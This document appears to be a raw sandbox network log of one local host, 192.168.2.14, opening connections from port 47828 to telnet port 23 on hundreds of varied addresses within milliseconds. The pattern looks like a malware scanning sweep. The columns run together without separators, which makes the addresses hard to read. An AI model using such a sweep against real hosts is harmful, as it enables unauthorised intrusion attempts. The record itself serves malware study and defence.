                                              Nov 23, 2023 05:14:51.524403095 CET4782823192.168.2.14197.35.252.184
                                              Nov 23, 2023 05:14:51.524403095 CET4782823192.168.2.14211.211.251.222
                                              Nov 23, 2023 05:14:51.524405003 CET4782823192.168.2.14110.183.179.43
                                              Nov 23, 2023 05:14:51.524405003 CET4782823192.168.2.14248.242.241.3
                                              Nov 23, 2023 05:14:51.524405003 CET4782823192.168.2.14241.201.175.228
                                              Nov 23, 2023 05:14:51.524405956 CET4782823192.168.2.14148.32.149.0
                                              Nov 23, 2023 05:14:51.524405003 CET4782823192.168.2.1460.225.110.233
                                              Nov 23, 2023 05:14:51.524406910 CET4782823192.168.2.14154.176.6.224
                                              Nov 23, 2023 05:14:51.524405956 CET4782823192.168.2.14249.68.117.169
                                              Nov 23, 2023 05:14:51.524405003 CET4782823192.168.2.14173.249.58.32
                                              Nov 23, 2023 05:14:51.524410963 CET4782823192.168.2.1416.174.24.35
                                              Nov 23, 2023 05:14:51.524410963 CET4782823192.168.2.1453.76.125.226
                                              Nov 23, 2023 05:14:51.524410963 CET4782823192.168.2.14171.224.255.173
                                              Nov 23, 2023 05:14:51.524411917 CET4782823192.168.2.14170.7.75.125
                                              Nov 23, 2023 05:14:51.524410963 CET4782823192.168.2.14202.200.245.89
                                              Nov 23, 2023 05:14:51.524413109 CET4782823192.168.2.14108.193.233.229
                                              Nov 23, 2023 05:14:51.524441004 CET4782823192.168.2.14199.53.204.5
                                              Nov 23, 2023 05:14:51.524441004 CET4782823192.168.2.1490.154.212.80
                                              Nov 23, 2023 05:14:51.524451971 CET4782823192.168.2.1472.151.224.107
                                              Nov 23, 2023 05:14:51.524451971 CET4782823192.168.2.1497.147.23.117
                                              Nov 23, 2023 05:14:51.524454117 CET4782823192.168.2.1479.193.3.86
                                              Nov 23, 2023 05:14:51.524454117 CET4782823192.168.2.14201.83.187.133
                                              Nov 23, 2023 05:14:51.524454117 CET4782823192.168.2.1414.205.30.56
                                              Nov 23, 2023 05:14:51.524454117 CET4782823192.168.2.1463.37.169.239
                                              Nov 23, 2023 05:14:51.524455070 CET4782823192.168.2.14249.40.125.182
                                              Nov 23, 2023 05:14:51.524454117 CET4782823192.168.2.14194.235.222.191
                                              Nov 23, 2023 05:14:51.524460077 CET4782823192.168.2.14125.47.227.77
                                              Nov 23, 2023 05:14:51.524455070 CET4782823192.168.2.1481.20.227.222
                                              Nov 23, 2023 05:14:51.524511099 CET4782823192.168.2.14218.200.79.224
                                              Nov 23, 2023 05:14:51.524511099 CET4782823192.168.2.1419.156.143.12
                                              Nov 23, 2023 05:14:51.524511099 CET4782823192.168.2.14243.117.102.165
                                              Nov 23, 2023 05:14:51.524521112 CET4782823192.168.2.1498.64.252.19
                                              Nov 23, 2023 05:14:51.524521112 CET4782823192.168.2.1485.231.159.224
                                              Nov 23, 2023 05:14:51.524521112 CET4782823192.168.2.14105.244.10.172
                                              Nov 23, 2023 05:14:51.524523973 CET4782823192.168.2.1420.73.19.87
                                              Nov 23, 2023 05:14:51.524523973 CET4782823192.168.2.14181.18.248.174
                                              Nov 23, 2023 05:14:51.524523973 CET4782823192.168.2.14195.189.166.201
                                              Nov 23, 2023 05:14:51.524523973 CET4782823192.168.2.1432.248.125.34
                                              Nov 23, 2023 05:14:51.524523973 CET4782823192.168.2.14223.49.180.245
                                              Nov 23, 2023 05:14:51.524524927 CET4782823192.168.2.1431.230.153.204
                                              Nov 23, 2023 05:14:51.524524927 CET4782823192.168.2.14148.176.220.253
                                              Nov 23, 2023 05:14:51.524524927 CET4782823192.168.2.14142.46.69.153
                                              Nov 23, 2023 05:14:51.524524927 CET4782823192.168.2.141.203.143.88
                                              Nov 23, 2023 05:14:51.524525881 CET4782823192.168.2.1464.243.161.149
                                              Nov 23, 2023 05:14:51.524525881 CET4782823192.168.2.14126.67.255.249
                                              Nov 23, 2023 05:14:51.524525881 CET4782823192.168.2.1473.26.170.43
                                              Nov 23, 2023 05:14:51.524525881 CET4782823192.168.2.14244.164.27.250
                                              Nov 23, 2023 05:14:51.524528027 CET4782823192.168.2.14159.186.107.175
                                              Nov 23, 2023 05:14:51.524528027 CET4782823192.168.2.14122.195.214.202
                                              Nov 23, 2023 05:14:51.524523973 CET4782823192.168.2.14123.141.189.231
                                              Nov 23, 2023 05:14:51.524528027 CET4782823192.168.2.14189.32.32.181
                                              Nov 23, 2023 05:14:51.524528027 CET4782823192.168.2.14191.102.14.43
                                              Nov 23, 2023 05:14:51.524528027 CET4782823192.168.2.14252.54.56.198
                                              Nov 23, 2023 05:14:51.524528027 CET4782823192.168.2.14156.65.123.102
                                              Nov 23, 2023 05:14:51.524528027 CET4782823192.168.2.1460.27.168.182
                                              Nov 23, 2023 05:14:51.524528027 CET4782823192.168.2.148.13.205.141
                                              Nov 23, 2023 05:14:51.524528027 CET4782823192.168.2.14211.170.169.108
                                              Nov 23, 2023 05:14:51.524528027 CET4782823192.168.2.1447.170.21.136
                                              Nov 23, 2023 05:14:51.524528027 CET4782823192.168.2.144.212.223.103
                                              Nov 23, 2023 05:14:51.524528027 CET4782823192.168.2.14115.12.11.46
                                              Nov 23, 2023 05:14:51.524528027 CET4782823192.168.2.1471.204.153.182
                                              Nov 23, 2023 05:14:51.524573088 CET4782823192.168.2.14130.214.154.128
                                              Nov 23, 2023 05:14:51.524573088 CET4782823192.168.2.1468.235.227.240
                                              Nov 23, 2023 05:14:51.524573088 CET4782823192.168.2.14187.88.129.114
                                              Nov 23, 2023 05:14:51.524573088 CET4782823192.168.2.14119.246.86.255
                                              Nov 23, 2023 05:14:51.524574995 CET4782823192.168.2.1495.207.24.78
                                              Nov 23, 2023 05:14:51.524581909 CET4782823192.168.2.14177.216.94.88
                                              Nov 23, 2023 05:14:51.524581909 CET4782823192.168.2.1493.155.85.211
                                              Nov 23, 2023 05:14:51.524583101 CET4782823192.168.2.14216.169.252.17
                                              Nov 23, 2023 05:14:51.524581909 CET4782823192.168.2.14221.64.166.121
                                              Nov 23, 2023 05:14:51.524581909 CET4782823192.168.2.142.20.22.152
                                              Nov 23, 2023 05:14:51.524584055 CET4782823192.168.2.1485.104.89.218
                                              Nov 23, 2023 05:14:51.524584055 CET4782823192.168.2.14156.244.138.78
                                              Nov 23, 2023 05:14:51.524584055 CET4782823192.168.2.141.12.38.177
                                              Nov 23, 2023 05:14:51.524584055 CET4782823192.168.2.1466.124.53.163
                                              Nov 23, 2023 05:14:51.524584055 CET4782823192.168.2.14240.51.97.124
                                              Nov 23, 2023 05:14:51.524584055 CET4782823192.168.2.1432.121.49.229
                                              Nov 23, 2023 05:14:51.524584055 CET4782823192.168.2.14174.153.85.180
                                              Nov 23, 2023 05:14:51.524584055 CET4782823192.168.2.14159.171.72.40
                                              Nov 23, 2023 05:14:51.524584055 CET4782823192.168.2.1472.165.182.217
                                              Nov 23, 2023 05:14:51.524677038 CET4782823192.168.2.1495.146.121.109
                                              Nov 23, 2023 05:14:51.524677038 CET4782823192.168.2.14194.241.95.58
                                              Nov 23, 2023 05:14:51.524677038 CET4782823192.168.2.1423.201.19.178
                                              Nov 23, 2023 05:14:51.524677992 CET4782823192.168.2.1484.140.121.56
                                              Nov 23, 2023 05:14:51.524678946 CET4782823192.168.2.14151.25.89.106
                                              Nov 23, 2023 05:14:51.524677992 CET4782823192.168.2.14242.99.193.19
                                              Nov 23, 2023 05:14:51.524681091 CET4782823192.168.2.1457.200.32.180
                                              Nov 23, 2023 05:14:51.524677992 CET4782823192.168.2.14189.171.201.99
                                              Nov 23, 2023 05:14:51.524678946 CET4782823192.168.2.1443.139.38.202
                                              Nov 23, 2023 05:14:51.524678946 CET4782823192.168.2.1471.139.11.248
                                              Nov 23, 2023 05:14:51.524681091 CET4782823192.168.2.14118.127.125.27
                                              Nov 23, 2023 05:14:51.524678946 CET4782823192.168.2.14243.174.10.154
                                              Nov 23, 2023 05:14:51.524678946 CET4782823192.168.2.1434.144.176.100
                                              Nov 23, 2023 05:14:51.524681091 CET4782823192.168.2.14146.126.80.239
                                              Nov 23, 2023 05:14:51.524677992 CET4782823192.168.2.1461.75.109.87
                                              Nov 23, 2023 05:14:51.524678946 CET4782823192.168.2.1468.163.2.20
                                              Nov 23, 2023 05:14:51.524678946 CET4782823192.168.2.14160.214.3.253
                                              Nov 23, 2023 05:14:51.524681091 CET4782823192.168.2.14220.186.68.75
                                              Nov 23, 2023 05:14:51.524677992 CET4782823192.168.2.14218.31.6.21
                                              Nov 23, 2023 05:14:51.524678946 CET4782823192.168.2.14221.253.12.25
                                              Nov 23, 2023 05:14:51.524679899 CET4782823192.168.2.1424.1.250.123
                                              Nov 23, 2023 05:14:51.524678946 CET4782823192.168.2.14108.112.153.78
                                              Nov 23, 2023 05:14:51.524677038 CET4782823192.168.2.14104.242.104.25
                                              Nov 23, 2023 05:14:51.524678946 CET4782823192.168.2.1487.127.33.228
                                              Nov 23, 2023 05:14:51.524679899 CET4782823192.168.2.14156.72.66.46
                                              Nov 23, 2023 05:14:51.524678946 CET4782823192.168.2.1488.86.27.130
                                              Nov 23, 2023 05:14:51.524678946 CET4782823192.168.2.14167.9.33.236
                                              Nov 23, 2023 05:14:51.524677992 CET4782823192.168.2.1435.144.226.79
                                              Nov 23, 2023 05:14:51.524678946 CET4782823192.168.2.14204.149.249.111
                                              Nov 23, 2023 05:14:51.524679899 CET4782823192.168.2.1481.209.207.133
                                              Nov 23, 2023 05:14:51.524678946 CET4782823192.168.2.14174.172.61.161
                                              Nov 23, 2023 05:14:51.524679899 CET4782823192.168.2.14197.110.244.139
                                              Nov 23, 2023 05:14:51.524678946 CET4782823192.168.2.149.153.112.239
                                              Nov 23, 2023 05:14:51.524679899 CET4782823192.168.2.149.183.113.176
                                              Nov 23, 2023 05:14:51.524678946 CET4782823192.168.2.1490.70.124.118
                                              Nov 23, 2023 05:14:51.524681091 CET4782823192.168.2.14154.52.113.170
                                              Nov 23, 2023 05:14:51.524681091 CET4782823192.168.2.14252.246.180.119
                                              Nov 23, 2023 05:14:51.524681091 CET4782823192.168.2.1495.185.72.3
                                              Nov 23, 2023 05:14:51.524707079 CET4782823192.168.2.1479.119.229.226
                                              Nov 23, 2023 05:14:51.524707079 CET4782823192.168.2.1460.134.152.204
                                              Nov 23, 2023 05:14:51.524717093 CET4782823192.168.2.1462.208.37.235
                                              Nov 23, 2023 05:14:51.524717093 CET4782823192.168.2.1459.196.94.2
                                              Nov 23, 2023 05:14:51.524717093 CET4782823192.168.2.14219.199.157.159
                                              Nov 23, 2023 05:14:51.524717093 CET4782823192.168.2.14143.251.152.171
                                              Nov 23, 2023 05:14:51.524717093 CET4782823192.168.2.1491.32.220.105
                                              Nov 23, 2023 05:14:51.524717093 CET4782823192.168.2.14121.188.89.20
                                              Nov 23, 2023 05:14:51.524723053 CET4782823192.168.2.1435.136.230.100
                                              Nov 23, 2023 05:14:51.524723053 CET4782823192.168.2.14103.92.167.177
                                              Nov 23, 2023 05:14:51.524723053 CET4782823192.168.2.14126.29.16.190
                                              Nov 23, 2023 05:14:51.524724007 CET4782823192.168.2.14122.139.178.152
                                              Nov 23, 2023 05:14:51.524723053 CET4782823192.168.2.14192.149.234.124
                                              Nov 23, 2023 05:14:51.524724007 CET4782823192.168.2.1431.69.1.73
                                              Nov 23, 2023 05:14:51.524723053 CET4782823192.168.2.1463.238.120.179
                                              Nov 23, 2023 05:14:51.524723053 CET4782823192.168.2.1460.193.57.208
                                              Nov 23, 2023 05:14:51.524723053 CET4782823192.168.2.1442.146.128.52
                                              Nov 23, 2023 05:14:51.524724007 CET4782823192.168.2.1469.56.56.37
                                              Nov 23, 2023 05:14:51.524724007 CET4782823192.168.2.1472.147.247.207
                                              Nov 23, 2023 05:14:51.524724007 CET4782823192.168.2.14163.135.200.59
                                              Nov 23, 2023 05:14:51.524724960 CET4782823192.168.2.14196.22.61.122
                                              Nov 23, 2023 05:14:51.524740934 CET4782823192.168.2.14102.101.158.49
                                              Nov 23, 2023 05:14:51.524740934 CET4782823192.168.2.14140.252.104.82
                                              Nov 23, 2023 05:14:51.524740934 CET4782823192.168.2.14207.20.25.252
                                              Nov 23, 2023 05:14:51.524740934 CET4782823192.168.2.14220.217.120.150
                                              Nov 23, 2023 05:14:51.524740934 CET4782823192.168.2.14152.22.78.198
                                              Nov 23, 2023 05:14:51.524770021 CET4782823192.168.2.14241.102.57.86
                                              Nov 23, 2023 05:14:51.524770021 CET4782823192.168.2.14245.98.103.139
                                              Nov 23, 2023 05:14:51.524770975 CET4782823192.168.2.14163.248.76.224
                                              Nov 23, 2023 05:14:51.524770975 CET4782823192.168.2.14108.46.178.226
                                              Nov 23, 2023 05:14:51.524770975 CET4782823192.168.2.14160.85.47.104
                                              Nov 23, 2023 05:14:51.524780035 CET4782823192.168.2.14121.63.240.186
                                              Nov 23, 2023 05:14:51.524780035 CET4782823192.168.2.1443.37.73.132
                                              Nov 23, 2023 05:14:51.524780989 CET4782823192.168.2.14140.204.203.251
                                              Nov 23, 2023 05:14:51.524780989 CET4782823192.168.2.14187.88.92.184
                                              Nov 23, 2023 05:14:51.524780989 CET4782823192.168.2.14222.18.214.156
                                              Nov 23, 2023 05:14:51.524785995 CET4782823192.168.2.14167.54.1.218
                                              Nov 23, 2023 05:14:51.524785995 CET4782823192.168.2.14124.50.215.92
                                              Nov 23, 2023 05:14:51.524785995 CET4782823192.168.2.14145.228.176.195
                                              Nov 23, 2023 05:14:51.524785995 CET4782823192.168.2.14179.106.76.239
                                              Nov 23, 2023 05:14:51.524801016 CET4782823192.168.2.14185.103.190.34
                                              Nov 23, 2023 05:14:51.524801016 CET4782823192.168.2.14162.100.58.70
                                              Nov 23, 2023 05:14:51.524801016 CET4782823192.168.2.14120.25.139.240
                                              Nov 23, 2023 05:14:51.524801016 CET4782823192.168.2.1493.74.58.118
                                              Nov 23, 2023 05:14:51.524820089 CET4782823192.168.2.14146.112.185.122
                                              Nov 23, 2023 05:14:51.524820089 CET4782823192.168.2.14153.238.79.226
                                              Nov 23, 2023 05:14:51.524820089 CET4782823192.168.2.1439.113.6.212
                                              Nov 23, 2023 05:14:51.524820089 CET4782823192.168.2.1497.180.180.236
                                              Nov 23, 2023 05:14:51.524820089 CET4782823192.168.2.14102.192.81.34
                                              Nov 23, 2023 05:14:51.524820089 CET4782823192.168.2.14186.197.120.101
                                              Nov 23, 2023 05:14:51.524827003 CET4782823192.168.2.14222.191.7.5
                                              Nov 23, 2023 05:14:51.524831057 CET4782823192.168.2.14193.50.41.23
                                              Nov 23, 2023 05:14:51.524831057 CET4782823192.168.2.1491.34.150.100
                                              Nov 23, 2023 05:14:51.524841070 CET4782823192.168.2.14119.214.86.1
                                              Nov 23, 2023 05:14:51.524841070 CET4782823192.168.2.14182.244.134.219
                                              Nov 23, 2023 05:14:51.524846077 CET4782823192.168.2.14118.136.88.132
                                              Nov 23, 2023 05:14:51.524846077 CET4782823192.168.2.1473.16.8.56
                                              Nov 23, 2023 05:14:51.524846077 CET4782823192.168.2.14176.45.16.198
                                              Nov 23, 2023 05:14:51.524846077 CET4782823192.168.2.14126.32.125.254
                                              Nov 23, 2023 05:14:51.524846077 CET4782823192.168.2.1475.196.159.49
                                              Nov 23, 2023 05:14:51.524847031 CET4782823192.168.2.14108.196.174.111
                                              Nov 23, 2023 05:14:51.524854898 CET4782823192.168.2.14197.74.168.74
                                              Nov 23, 2023 05:14:51.524856091 CET4782823192.168.2.14162.132.160.221
                                              Nov 23, 2023 05:14:51.524871111 CET4782823192.168.2.14186.119.37.96
                                              Nov 23, 2023 05:14:51.524871111 CET4782823192.168.2.14153.103.45.31
                                              Nov 23, 2023 05:14:51.524890900 CET4782823192.168.2.14105.249.213.79
                                              Nov 23, 2023 05:14:51.524890900 CET4782823192.168.2.14159.205.148.46
                                              Nov 23, 2023 05:14:51.524892092 CET4782823192.168.2.14113.120.117.165
                                              Nov 23, 2023 05:14:51.524892092 CET4782823192.168.2.14123.134.136.119
                                              Nov 23, 2023 05:14:51.524892092 CET4782823192.168.2.14117.211.150.59
                                              Nov 23, 2023 05:14:51.524900913 CET4782823192.168.2.1480.42.88.220
                                              Nov 23, 2023 05:14:51.524900913 CET4782823192.168.2.1491.157.162.41
                                              Nov 23, 2023 05:14:51.524900913 CET4782823192.168.2.1447.33.77.176
                                              Nov 23, 2023 05:14:51.524900913 CET4782823192.168.2.1445.86.16.47
                                              Nov 23, 2023 05:14:51.524902105 CET4782823192.168.2.14194.124.143.241
                                              Nov 23, 2023 05:14:51.524902105 CET4782823192.168.2.14206.58.170.40
                                              Nov 23, 2023 05:14:51.524907112 CET4782823192.168.2.1417.21.246.247
                                              Nov 23, 2023 05:14:51.524923086 CET4782823192.168.2.14200.119.43.131
                                              Nov 23, 2023 05:14:51.524923086 CET4782823192.168.2.14174.14.71.141
                                              Nov 23, 2023 05:14:51.524930000 CET4782823192.168.2.145.149.247.3
                                              Nov 23, 2023 05:14:51.524936914 CET4782823192.168.2.14105.215.159.183
                                              Nov 23, 2023 05:14:51.524939060 CET4782823192.168.2.14108.44.185.25
                                              Nov 23, 2023 05:14:51.524940968 CET4782823192.168.2.14184.191.177.138
                                              Nov 23, 2023 05:14:51.524945974 CET4782823192.168.2.1499.122.116.65
                                              Nov 23, 2023 05:14:51.524954081 CET4782823192.168.2.14210.2.177.162
                                              Nov 23, 2023 05:14:51.524974108 CET4782823192.168.2.14111.92.216.38
                                              Nov 23, 2023 05:14:51.524975061 CET4782823192.168.2.14136.88.57.234
                                              Nov 23, 2023 05:14:51.524986029 CET4782823192.168.2.149.16.239.105
                                              Nov 23, 2023 05:14:51.524987936 CET4782823192.168.2.14156.64.189.235
                                              Nov 23, 2023 05:14:51.524987936 CET4782823192.168.2.14136.8.155.68
                                              Nov 23, 2023 05:14:51.525007010 CET4782823192.168.2.1413.37.10.155
                                              Nov 23, 2023 05:14:51.525007010 CET4782823192.168.2.1444.63.185.112
                                              Nov 23, 2023 05:14:51.525017023 CET4782823192.168.2.14216.223.160.179
                                              Nov 23, 2023 05:14:51.525017023 CET4782823192.168.2.14105.243.203.58
                                              Nov 23, 2023 05:14:51.525019884 CET4782823192.168.2.1448.60.165.100
                                              Nov 23, 2023 05:14:51.525027037 CET4782823192.168.2.14200.228.50.197
                                              Nov 23, 2023 05:14:51.525042057 CET4782823192.168.2.1454.117.146.15
                                              Nov 23, 2023 05:14:51.525058031 CET4782823192.168.2.14240.204.101.226
                                              Nov 23, 2023 05:14:51.525072098 CET4782823192.168.2.1420.205.117.133
                                              Nov 23, 2023 05:14:51.525075912 CET4782823192.168.2.14126.71.248.38
                                              Nov 23, 2023 05:14:51.525082111 CET4782823192.168.2.14173.7.166.239
                                              Nov 23, 2023 05:14:51.525084972 CET4782823192.168.2.14141.222.73.81
                                              Nov 23, 2023 05:14:51.525101900 CET4782823192.168.2.14163.151.160.201
                                              Nov 23, 2023 05:14:51.525104046 CET4782823192.168.2.14140.249.75.22
                                              Nov 23, 2023 05:14:51.525114059 CET4782823192.168.2.1447.13.71.238
                                              Nov 23, 2023 05:14:51.525116920 CET4782823192.168.2.14213.205.186.225
                                              Nov 23, 2023 05:14:51.525131941 CET4782823192.168.2.1423.218.145.168
                                              Nov 23, 2023 05:14:51.525132895 CET4782823192.168.2.1463.31.17.163
                                              Nov 23, 2023 05:14:51.525136948 CET4782823192.168.2.1440.237.63.202
                                              Nov 23, 2023 05:14:51.525141954 CET4782823192.168.2.14125.14.87.132
                                              Nov 23, 2023 05:14:51.525150061 CET4782823192.168.2.14101.38.14.138
                                              Nov 23, 2023 05:14:51.525161982 CET4782823192.168.2.1477.247.79.102
                                              Nov 23, 2023 05:14:51.525161982 CET4782823192.168.2.14133.48.30.47
                                              Nov 23, 2023 05:14:51.525171041 CET4782823192.168.2.14185.155.162.251
                                              Nov 23, 2023 05:14:51.525185108 CET4782823192.168.2.1432.123.131.38
                                              Nov 23, 2023 05:14:51.525187016 CET4782823192.168.2.14163.159.161.92
                                              Nov 23, 2023 05:14:51.525187016 CET4782823192.168.2.14117.154.243.166
                                              Nov 23, 2023 05:14:51.525203943 CET4782823192.168.2.14103.131.217.200
                                              Nov 23, 2023 05:14:51.525206089 CET4782823192.168.2.14184.123.80.250
                                              Nov 23, 2023 05:14:51.525212049 CET4782823192.168.2.14240.14.196.16
                                              Nov 23, 2023 05:14:51.525223970 CET4782823192.168.2.1446.231.5.39
                                              Nov 23, 2023 05:14:51.525224924 CET4782823192.168.2.14245.190.73.114
                                              Nov 23, 2023 05:14:51.525250912 CET4782823192.168.2.14217.253.203.223
                                              Nov 23, 2023 05:14:51.525258064 CET4782823192.168.2.1463.239.159.221
                                              Nov 23, 2023 05:14:51.525259018 CET4782823192.168.2.14107.153.3.156
                                              Nov 23, 2023 05:14:51.525259972 CET4782823192.168.2.14102.176.240.176
                                              Nov 23, 2023 05:14:51.525258064 CET4782823192.168.2.14165.65.120.226
                                              Nov 23, 2023 05:14:51.525280952 CET4782823192.168.2.1442.79.46.179
                                              Nov 23, 2023 05:14:51.525281906 CET4782823192.168.2.14222.113.123.50
                                              Nov 23, 2023 05:14:51.525284052 CET4782823192.168.2.1491.86.169.121
                                              Nov 23, 2023 05:14:51.525284052 CET4782823192.168.2.14242.255.246.198
                                              Nov 23, 2023 05:14:51.525285959 CET4782823192.168.2.14170.32.51.111
                                              Nov 23, 2023 05:14:51.525285959 CET4782823192.168.2.14112.199.42.196
                                              Nov 23, 2023 05:14:51.525288105 CET4782823192.168.2.1413.48.139.11
                                              Nov 23, 2023 05:14:51.525290012 CET4782823192.168.2.14213.227.26.131
                                              Nov 23, 2023 05:14:51.525299072 CET4782823192.168.2.14105.118.183.185
                                              Nov 23, 2023 05:14:51.525301933 CET4782823192.168.2.14124.200.18.195
                                              Nov 23, 2023 05:14:51.525307894 CET4782823192.168.2.14100.27.116.240
                                              Nov 23, 2023 05:14:51.525307894 CET4782823192.168.2.14171.119.235.91
                                              Nov 23, 2023 05:14:51.525309086 CET4782823192.168.2.1493.49.134.141
                                              Nov 23, 2023 05:14:51.525321007 CET4782823192.168.2.14136.15.124.33
                                              Nov 23, 2023 05:14:51.525324106 CET4782823192.168.2.14212.66.28.87
                                              Nov 23, 2023 05:14:51.525332928 CET4782823192.168.2.1489.130.20.228
                                              Nov 23, 2023 05:14:51.525337934 CET4782823192.168.2.1416.74.206.85
                                              Nov 23, 2023 05:14:51.525338888 CET4782823192.168.2.14118.67.185.72
                                              Nov 23, 2023 05:14:51.525355101 CET4782823192.168.2.1467.248.238.120
                                              Nov 23, 2023 05:14:51.525357008 CET4782823192.168.2.1423.146.118.175
                                              Nov 23, 2023 05:14:51.525362968 CET4782823192.168.2.14169.17.219.66
                                              Nov 23, 2023 05:14:51.525373936 CET4782823192.168.2.14213.175.218.194
                                              Nov 23, 2023 05:14:51.525374889 CET4782823192.168.2.1458.115.195.49
                                              Nov 23, 2023 05:14:51.525373936 CET4782823192.168.2.14247.194.227.11
                                              Nov 23, 2023 05:14:51.525389910 CET4782823192.168.2.1442.69.0.246
                                              Nov 23, 2023 05:14:51.525389910 CET4782823192.168.2.1466.126.74.238
                                              Nov 23, 2023 05:14:51.525394917 CET4782823192.168.2.1445.79.135.67
                                              Nov 23, 2023 05:14:51.525398970 CET4782823192.168.2.1496.132.174.87
                                              Nov 23, 2023 05:14:51.525403976 CET4782823192.168.2.1453.109.39.219
                                              Nov 23, 2023 05:14:51.525413036 CET4782823192.168.2.14112.228.93.62
                                              Nov 23, 2023 05:14:51.525413990 CET4782823192.168.2.14180.40.236.141
                                              Nov 23, 2023 05:14:51.525440931 CET4782823192.168.2.14145.235.61.231
                                              Nov 23, 2023 05:14:51.525445938 CET4782823192.168.2.14250.116.217.195
                                              Nov 23, 2023 05:14:51.525446892 CET4782823192.168.2.14184.205.155.34
                                              Nov 23, 2023 05:14:51.525446892 CET4782823192.168.2.144.102.171.162
                                              Nov 23, 2023 05:14:51.525450945 CET4782823192.168.2.1431.68.94.28
                                              Nov 23, 2023 05:14:51.525470972 CET4782823192.168.2.14206.63.124.183
                                              Nov 23, 2023 05:14:51.525474072 CET4782823192.168.2.14205.224.86.247
                                              Nov 23, 2023 05:14:51.525475025 CET4782823192.168.2.1442.118.120.103
                                              Nov 23, 2023 05:14:51.525477886 CET4782823192.168.2.14175.237.127.24
                                              Nov 23, 2023 05:14:51.525482893 CET4782823192.168.2.142.102.96.109
                                              Nov 23, 2023 05:14:51.525497913 CET4782823192.168.2.14163.139.196.226
                                              Nov 23, 2023 05:14:51.525501966 CET4782823192.168.2.14220.215.119.99
                                              Nov 23, 2023 05:14:51.525501966 CET4782823192.168.2.14146.170.239.168
                                              Nov 23, 2023 05:14:51.525517941 CET4782823192.168.2.14209.109.112.55
                                              Nov 23, 2023 05:14:51.525517941 CET4782823192.168.2.1485.210.67.210
                                              Nov 23, 2023 05:14:51.525518894 CET4782823192.168.2.14102.39.46.9
                                              Nov 23, 2023 05:14:51.525527954 CET4782823192.168.2.14210.218.20.49
                                              Nov 23, 2023 05:14:51.525532007 CET4782823192.168.2.14193.236.93.115
                                              Nov 23, 2023 05:14:51.525552034 CET4782823192.168.2.14202.162.208.33
                                              Nov 23, 2023 05:14:51.525552034 CET4782823192.168.2.14171.5.129.131
                                              Nov 23, 2023 05:14:51.525552034 CET4782823192.168.2.14169.192.16.18
                                              Nov 23, 2023 05:14:51.525557995 CET4782823192.168.2.1494.46.117.195
                                              Nov 23, 2023 05:14:51.525571108 CET4782823192.168.2.14149.249.198.184
                                              Nov 23, 2023 05:14:51.525573969 CET4782823192.168.2.14194.80.36.242
                                              Nov 23, 2023 05:14:51.525579929 CET4782823192.168.2.1480.198.248.106
                                              Nov 23, 2023 05:14:51.525584936 CET4782823192.168.2.14210.103.197.110
                                              Nov 23, 2023 05:14:51.525597095 CET4782823192.168.2.14204.74.65.140
                                              Nov 23, 2023 05:14:51.525604010 CET4782823192.168.2.141.183.184.20
                                              Nov 23, 2023 05:14:51.525605917 CET4782823192.168.2.14184.98.27.161
                                              Nov 23, 2023 05:14:51.525608063 CET4782823192.168.2.1491.198.67.103
                                              Nov 23, 2023 05:14:51.525610924 CET4782823192.168.2.14105.16.21.104
                                              Nov 23, 2023 05:14:51.525618076 CET4782823192.168.2.14117.71.211.52
                                              Nov 23, 2023 05:14:51.525628090 CET4782823192.168.2.1444.231.15.209
                                              Nov 23, 2023 05:14:51.525629044 CET4782823192.168.2.14204.92.10.235
                                              Nov 23, 2023 05:14:51.525629044 CET4782823192.168.2.14136.233.117.167
                                              Nov 23, 2023 05:14:51.525629044 CET4782823192.168.2.14107.122.238.57
                                              Nov 23, 2023 05:14:51.525638103 CET4782823192.168.2.14209.198.53.46
                                              Nov 23, 2023 05:14:51.525644064 CET4782823192.168.2.1444.203.220.69
                                              Nov 23, 2023 05:14:51.525654078 CET4782823192.168.2.14195.193.206.193
                                              Nov 23, 2023 05:14:51.525660038 CET4782823192.168.2.14171.183.190.51
                                              Nov 23, 2023 05:14:51.525661945 CET4782823192.168.2.1464.233.138.169
                                              Nov 23, 2023 05:14:51.525667906 CET4782823192.168.2.14218.189.218.59
                                              Nov 23, 2023 05:14:51.525677919 CET4782823192.168.2.1431.48.116.52
                                              Nov 23, 2023 05:14:51.525680065 CET4782823192.168.2.14222.161.199.221
                                              Nov 23, 2023 05:14:51.525685072 CET4782823192.168.2.1484.59.113.210
                                              Nov 23, 2023 05:14:51.525693893 CET4782823192.168.2.14249.251.105.238
                                              Nov 23, 2023 05:14:51.525697947 CET4782823192.168.2.14165.191.53.114
                                              Nov 23, 2023 05:14:51.525721073 CET4782823192.168.2.1432.46.255.4
                                              Nov 23, 2023 05:14:51.525721073 CET4782823192.168.2.1444.216.164.25
                                              Nov 23, 2023 05:14:51.525728941 CET4782823192.168.2.1491.194.244.124
                                              Nov 23, 2023 05:14:51.525738001 CET4782823192.168.2.1485.237.210.212
                                              Nov 23, 2023 05:14:51.525739908 CET4782823192.168.2.14126.72.64.180
                                              Nov 23, 2023 05:14:51.525753975 CET4782823192.168.2.1482.200.121.96
                                              Nov 23, 2023 05:14:51.525757074 CET4782823192.168.2.1458.232.244.93
                                              Nov 23, 2023 05:14:51.525769949 CET4782823192.168.2.1446.191.232.252
                                              Nov 23, 2023 05:14:51.525772095 CET4782823192.168.2.14206.77.78.231
                                              Nov 23, 2023 05:14:51.525784016 CET4782823192.168.2.1474.77.36.176
                                              Nov 23, 2023 05:14:51.525785923 CET4782823192.168.2.14196.86.233.97
                                              Nov 23, 2023 05:14:51.525804043 CET4782823192.168.2.1447.13.21.247
                                              Nov 23, 2023 05:14:51.525804043 CET4782823192.168.2.14248.106.183.21
                                              Nov 23, 2023 05:14:51.525815964 CET4782823192.168.2.1471.31.209.18
                                              Nov 23, 2023 05:14:51.525815964 CET4782823192.168.2.1468.189.200.85
                                              Nov 23, 2023 05:14:51.525829077 CET4782823192.168.2.149.64.180.137
                                              Nov 23, 2023 05:14:51.525831938 CET4782823192.168.2.1489.142.12.147
                                              Nov 23, 2023 05:14:51.525840998 CET4782823192.168.2.14170.73.205.144
                                              Nov 23, 2023 05:14:51.525840998 CET4782823192.168.2.14174.79.234.175
                                              Nov 23, 2023 05:14:51.525847912 CET4782823192.168.2.1482.155.32.17
                                              Nov 23, 2023 05:14:51.525851011 CET4782823192.168.2.1465.80.152.129
                                              Nov 23, 2023 05:14:51.525855064 CET4782823192.168.2.14115.171.215.66
                                              Nov 23, 2023 05:14:51.525867939 CET4782823192.168.2.14199.4.76.40
                                              Nov 23, 2023 05:14:51.525867939 CET4782823192.168.2.14222.33.145.67
                                              Nov 23, 2023 05:14:51.525871992 CET4782823192.168.2.14199.16.117.128
                                              Nov 23, 2023 05:14:51.525906086 CET4782823192.168.2.14221.41.117.199
